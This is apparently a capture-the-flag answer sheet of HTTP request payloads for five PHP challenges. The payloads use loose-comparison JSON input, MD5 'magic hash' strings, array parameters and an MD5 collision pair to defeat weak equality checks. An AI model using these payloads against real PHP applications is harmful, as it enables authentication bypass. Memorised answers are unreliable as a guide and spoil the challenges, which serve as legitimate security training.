php1
POST
secret={"key":0}

php2
GET
a=s878926199a&b=s155964671a

php3
GET
a[]=1&b[]=2

php4
GET
a=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%8D%7D%06%7E%CB%BAo%A3%2F%03%ED+%FD%16%CBkx%F6%B3%0A%FF%23%E2%605r%3A%AE%2F%98%9BC%D0%A5%C3%D2%CEv%07%06O%2C%D9%DB%B0%EF%F1Z%B5%80%3D%10%09%8D6%7Cr-%2F%FD.6%E2%19%FA%00%24Y%2C%85v%08%BC%ED%1C%B6%3E%2B%B8q%D9%95%93%BD%12%FF0%8El9%A4_KQ%CF%C1%24%B2%C8%0AtL%A3%7F%A6%9Ag%B9%7B7%E0H%11X%1C%29%AF.m..%C72H%B45ku&b=1%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%8D%7D%06%7E%CB%BAo%A3%2F%03%ED+%FD%16%CBkx%F6%B3%8A%FF%23%E2%605r%3A%AE%2F%98%9BC%D0%A5%C3%D2%CEv%07%06O%2C%D9%DB%B0o%F1Z%B5%80%3D%10%09%8D6%7Cr-%2F%7D.6%E2%19%FA%00%24Y%2C%85v%08%BC%ED%1C%B6%3E%2B%B8q%D9%95%93%3D%12%FF0%8El9%A4_KQ%CF%C1%24%B2%C8%0AtL%A3%7F%A6%9Ag%B9%7B%B7%E0H%11X%1C%29%AF.m..%C72%C8%B45ku

php5
POST
md5=0e215962017